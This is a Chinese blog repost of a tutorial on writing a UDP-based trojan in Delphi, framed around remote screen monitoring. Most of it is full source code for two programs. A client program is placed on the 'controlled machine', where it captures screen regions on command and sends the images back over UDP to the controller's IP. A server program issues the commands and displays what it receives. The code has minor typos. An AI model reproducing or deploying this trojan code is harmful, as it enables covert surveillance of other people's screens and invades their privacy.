- 浏览: 485895 次
- 性别:
- 来自: xiamen
文章分类
最新评论
-
陈乐鹏:
你这个下载要怎么玩?我这里老提示未安装!
[转]使用ScriptX控件进行Web打印总结 -
zqb666kkk:
博主有示例代码吗
cxf ws-security 加密和签名的实现 -
mclin0704:
你好,请问WSDL2Java 可以用java实现吗?
Java2WSDL之java实现 -
hubiao0629:
楼主,这个文件会有不兼容的问题把。
mysql5忘记密码后的处理方法 -
zhaoyubetter:
OK,可以试试!多谢楼主
后台管理界面收集
用UDP协议的木马编写方法(Delphi版)
木马的一个很重要的功能就是远程监视屏幕,下面的文章讲述了怎样利用UDP协议来实现,而不是我们通常用到的tcp/ip协议,很有特色,值得一学。
一、软硬件要求。
Windows95/98对等网,用来监视的计算机(以下简称主控机)和被监视的计算机(以下简称受控机)都必须装有TCP/IP 协议,并正确配置。如没有网络,也可以在一台计算机上进行调试。
二、实现方法。
编制两个应用程序,一个为VClient.exe,装在受控机上,另一个为VServer.exe,装在主控机上。VServer.exe指定要监视的受控机的IP地址和将要在受控机屏幕上抓取区域的大小和位置,并发出屏幕抓取指令给VClient.exe,VClient.exe得到指令后,在受控机屏幕上选取指定区域,生成数据流,将其发回主控机,并在主控机上显示出抓取区域的BMP图象。由以上过程可以看出,该方法的关键有二:一是如何在受控机上进行屏幕抓取,二是如何通过TCP/IP协议在两台计算机中传输数据。
UDP(User Datagram Protocol,意为用户报文协议)是Internet上广泛采用的通信协议之一。与TCP协议不同,它是一种非连接的传输协议,没有确认机制,可靠性不如TCP,但它的效率却比TCP高,用于远程屏幕监视还是比较适合的。同时,UDP控件不区分服务器端和客户端,只区分发送端和接收端,编程上较为简单,故选用UDP协议,使用Delphi 4.0提供的TNMUDP控件。
三、创建演示程序。
第一步,编制VClient.exe文件。新建Delphi工程,将默认窗体的Name属性设为“Client”。加入TNMUDP控件,Name属性设为“CUDP”;LocalPort属性设为“1111”,让控件CUDP监视受控机的1111端口,当有数据发送到该口时,触发控件CUDP的OnDataReceived事件;RemotePort属性设为“2222”,当控件CUDP发送数据时,将数据发到主控机的2222口。
在implementation后面加入变量定义
const BufSize=2048;{ 发送每一笔数据的缓冲区大小 }
var
BmpStream:TMemoryStream;
LeftSize:Longint;{ 发送每一笔数据后剩余的字节数 }
为Client的OnCreate事件添加代码:
procedure TClient.FormCreate(Sender: TObject);
begin
BmpStream:=TMemoryStream.Create;
end;
为Client的OnDestroy事件添加代码:
procedure TClient.FormDestroy(Sender: TObject);
begin
BmpStream.Free;
end;
为控件CUDP的OnDataReceived事件添加代码:
procedure TClient.CUDPDataReceived(Sender: TComponent;
NumberBytes: Integer; FromIP: String);
var
CtrlCode:array[0..29] of char;
Buf:array[0..BufSize-1] of char;
TmpStr:string;
SendSize,LeftPos,TopPos,RightPos,BottomPos:integer;
begin
CUDP.ReadBuffer(CtrlCode,NumberBytes);{ 读取控制码 }
if CtrlCode[0]+CtrlCode[1]+CtrlCode[2]+CtrlCode[3]='show' then
begin { 控制码前4位为“show”表示主控机发出了抓屏指令 }
if BmpStream.Size=0 then { 没有数据可发,必须截屏生成数据 }
begin
TmpStr:=StrPas(CtrlCode);
TmpStr:=Copy(TmpStr,5,Length(TmpStr)-4);
LeftPos:=StrToInt(Copy(TmpStr,1,Pos(':',TmpStr)-1));
TmpStr:=Copy(TmpStr,Pos(':',TmpStr)+1,Length(TmpStr) -Pos(':',TmpStr));
TopPos:=StrToInt(Copy(TmpStr,1,Pos(':',TmpStr)-1));
TmpStr:=Copy(TmpStr,Pos(':',TmpStr)+1,Length(TmpStr)-Pos(':',TmpStr));
RightPos:=StrToInt(Copy(TmpStr,1,Pos(':',TmpStr)-1));
BottomPos:=StrToInt(Copy(TmpStr,Pos(':',TmpStr)+1,Length(TmpStr)-Pos':',TmpStr)));
ScreenCap(LeftPos,TopPos,RightPos,BottomPos); { 截取屏幕 }
end;
if LeftSize>BufSize then SendSize:=BufSize
else SendSize:=LeftSize;
BmpStream.ReadBuffer(Buf,SendSize);
LeftSize:=LeftSize-SendSize;
if LeftSize=0 then BmpStream.Clear;{ 清空流 }
CUDP.RemoteHost:=FromIP; { FromIP为主控机IP地址 }
CUDP.SendBuffer(Buf,SendSize); { 将数据发到主控机的2222口 }
end;
end;
其中ScreenCap是自定义函数,截取屏幕指定区域,
代码如下:
procedure TClient.ScreenCap(LeftPos,TopPos,
RightPos,BottomPos:integer);
var
RectWidth,RectHeight:integer;
SourceDC,DestDC,Bhandle:integer;
Bitmap:TBitmap;
begin
RectWidth:=RightPos-LeftPos;
RectHeight:=BottomPos-TopPos;
SourceDC:=CreateDC('DISPLAY','','',nil);
DestDC:=CreateCompatibleDC(SourceDC);
Bhandle:=CreateCompatibleBitmap(SourceDC,
RectWidth,RectHeight);
SelectObject(DestDC,Bhandle);
BitBlt(DestDC,0,0,RectWidth,RectHeight,SourceDC,
LeftPos,TopPos,SRCCOPY);
Bitmap:=TBitmap.Create;
Bitmap.Handle:=BHandle;
BitMap.SaveToStream(BmpStream);
BmpStream.Position:=0;
LeftSize:=BmpStream.Size;
Bitmap.Free;
DeleteDC(DestDC);
ReleaseDC(Bhandle,SourceDC);
end;
存为“C:\VClient\ClnUnit.pas”和“C:\VClient\VClient.dpr”,
并编译。
第二步,编制VServer.exe文件。
新建Delphi工程,将窗体的Name属性设为“Server”。加入TNMUDP控件,Name属性设为“SUDP”;LocalPort属性设为“2222”,让控件SUDP监视主控机的2222端口,当有数据发送到该口时,触发控件SUDP的OnDataReceived事件;RemotePort属性设为“1111”,当控件SUDP发送数据时,将数据发到受控机的1111口。加入控件Image1,Align属性设为“alClient”;加入控件Button1,Caption属性设为“截屏”;加入控件Label1,Caption属性设为“左:上:右:下”;加入控件Edit1,Text属性设为“0:0:100:100”;加入控件Label2,Caption属性设为“受控机IP地址”;加入控件Edit2,Text属性设为“127.0.0.1”;
在implementation后面加入变量定义
const BufSize=2048;
var
RsltStream,TmpStream:TMemoryStream;
为Server的OnCreate事件添加代码:
procedure TServer.FormCreate(Sender: TObject);
begin
RsltStream:=TMemoryStream.Create;
TmpStream:=TMemoryStream.Create;
end;
为Client的OnDestroy事件添加代码:
procedure TServer.FormDestroy(Sender: TObject);
begin
RsltStream.Free;
TmpStream.Free;
end;
为控件Button1的OnClick事件添加代码:
procedure TServer.Button1Click(Sender: TObject);
var ReqCode:array[0..29] of char;ReqCodeStr:string;
begin
ReqCodeStr:='show'+Edit1.Text;
StrpCopy(ReqCode,ReqCodeStr);
TmpStream.Clear;
RsltStream.Clear;
SUDP.RemoteHost:=Edit2.Text;
SUDP.SendBuffer(ReqCode,30);
end;
为控件SUDP的OnDataReceived事件添加代码:
procedure TServer.SUDPDataReceived(Sender: TComponent;
NumberBytes: Integer; FromIP: String);
var ReqCode:array[0..29] of char;ReqCodeStr:string;
begin
ReqCodeStr:='show'+Edit1.text;
StrpCopy(ReqCode,ReqCodeStr);
SUDP.ReadStream(TmpStream);
RsltStream.CopyFrom(TmpStream,NumberBytes);
if NumberBytes< BufSize then { 数据已读完 }
begin
RsltStream.Position:=0;
Image1.Picture.Bitmap.LoadFromStream(RsltStream);
TmpStream.Clear;
RsltStream.Clear;
end
else
begin
TmpStream.Clear;
ReqCode:='show';
SUDP.RemoteHost:=Edit2.Text;
SUDP.SendBuffer(ReqCode,30);
end;
end;
存为“C:\VServer\SvrUnit.pas”和
“C:\VServer\VServer.dpr”,并编译。
---- 四、测试。
1、本地机测试:在本地机同时运行Vserver.exe和VClient.exe,利用程序的默认设置,即可实现截屏。查看“控制面板”-“网络”-“TCP/IP”-“IP地址”,将程序的“客户IP地址”设为该地址 ,同样正常运行。
2、远程测试:选一台受控机,运行VClient.exe;另选一台主控机,运行VServer.exe,将“受控机IP地址”即Edit2的内容设为受控机的IP地址,“截屏”即可。以上简要介绍了远程屏幕抓取的实现方法,至于在主控机上一屏同时监视多个受控机,读者可自行完善。以上程序,在Windows98对等网、Delphi 4.0下调试通过
发表评论
-
MD5 加密与解密 免费网站
2011-09-14 15:38 923http://www.md5encryption. ... -
listener、filter、servlet、beans执行顺序如何
2011-04-15 11:19 3398在典型的J2EE里面 可以肯定的是,加载顺序与他们在web ... -
dos 测试网络连接是否正常(bat)
2010-11-10 23:55 3509由于一个亲戚,电脑水平不高,有时候电脑老上不了网,自己不明白原 ... -
html - 7种加密方法
2010-10-12 10:50 1109本文一共介绍了七种方法: 一:最简单的加密解密 二:转义字 ... -
IIS5.1 for xp2
2010-06-10 16:29 1675一般使用系统都是winXP2 Ghost 版本 这种版本一般 ... -
SP2:XP双用户同时登录的方法
2010-05-17 09:29 2008首先特地声明下: ... -
2003 用户权限控制
2010-01-15 17:43 12011 在控制面板-->用户账户 创建一个账户,用户名我们设 ... -
Windows无法连接到选定网络,网络可能不在区域中。请刷新可用网络的列表,重新尝试
2009-11-03 14:34 30516一直以来Windows XP2 在公司网络中就是设置了密钥无法 ... -
54 个优秀的 UNDER CONSTRUCTION 页设计(下)
2009-04-13 10:35 10931. Luke’s Beard 2. Fav ... -
54 个优秀的 UNDER CONSTRUCTION 页设计
2009-04-13 10:33 1230一个空荡荡的页面,上面有一个卡通小人用铁锹铲土,这是我们印象中 ... -
如何创建自己的Linux发行版
2009-04-13 10:28 1072很多人或许对Linux发行版有了一种一成不变的看法:桌面不是K ... -
最受欢迎的11款跨平台免费软件
2009-04-13 10:27 1039"基于Windows和Linux的优秀应用软件都不少 ... -
15个最受Web开发者欢迎的文本编辑器
2009-04-13 10:24 1227对许多开发者来说,在开发复杂的Web应用程序、编辑CSS文件或 ... -
Tonido实现合作、文件共享等无云化
2009-03-24 10:58 1082DNA24 写道 " 不是每一个人都希望在云计算下 ... -
2008年最漂亮的50套图标
2009-03-24 10:30 2982在互联网上图标无处不在,最现代的设计不仅仅是用来完成一个设计任 ... -
9个基于JavaScript和CSS的Web图表框架
2009-03-24 10:26 1315"jQuery, MooTools, Prototy ... -
40个轻量级JavaScript库(二)
2009-03-09 15:29 1358COMSHARP CMS 写道 " ... -
40个轻量级JavaScript库
2009-03-09 15:25 1000COMSHARP CMS 写道 " ... -
40个轻量级JavaScript库
2009-03-09 15:25 1032COMSHARP CMS 写道 " ... -
2009年将出现的10项技术
2009-03-05 14:16 8213/4月份的《MIT技术评论 ...
相关推荐
基于Delphi的简单UDP协议传送数据,数据由服务器端传送到客户端,UDP协议最简单的编写
在Delphi67中利用UDP协议传送文件的例子.rar
udp多个客户端 udp的类 java编写 界面友好
0-548字节:会完美的展现UDP协议的优势(速度刷刷的)。 大于1472字节以后的话,也可以正常执行。你会见识到什么叫做不可靠的信道(经过测试90%以上还是成功的,只是速度慢了很多)。 数据包大于2K速度明显变慢了;...
用UDP协议实现网络通信
C++ Builder编写的用UDP协议实现远程监视屏幕,UDP(User Datagram Protocol,意为用户报文协议)是Internet上广泛采用的通信协议之一。与TCP协议不同,它是一种非连接的传输协议,没有确认机制,可靠性不如TCP,但它...
一个使用UDP协议写的围棋
Qt使用udp协议示例,简单易懂:核心类QUdpSocket.实现简单的广播通信
用indy10 udp 收发结构体,在delphi 2010下编译。由于udp本身是无连接的,故只用一个服务器端控件(idudpsever)就可以完成udp通信。
本demo为使用UDP协议进行网络通讯,来控制音频矩阵的音量大小及开关,需要使用UDP协议的可以参考里面关于UDP部分代码,很简单,一个类就可以搞定
UDP协议中文版.pdf
湘潭大学 网络协议TCP/IP实验六 UDP 协议分析实验报告,仅供参考
这个是·基于Delphi开发的UDP广播和单薄的通讯示例,附有代码
UDP打洞原理,Delphi演示 对于Cone NAT.要采用UDP打洞.需要一个公网机器C来充当”介绍人”.内网的A,B先分别和C通信.打开各自的NAT端口.C这个时候知道A,B的公网IP: Port. 现在A和B想直接连接.比如A给B发.除非B是Full ...
java使用udp协议进行数据收发处理,java使用udp协议进行数据收发处理
用udp协议编写一个简单的小例子 发送心跳包的
UDP 协议 Verilog FPGA ,很详细,有注释。UDP 协议 Verilog FPGA ,很详细,有注释。
可以发送表情,文字,基于UDP协议开发的一款聊天工具。
。。。。。。。VB编写的TCP/UDP协议网口通讯调试助手源代码
自己利用UDP协议编写的两个源代码,一个做客户端,一个做服务器,实现信息的传输,有利于帮助理解UDP协议。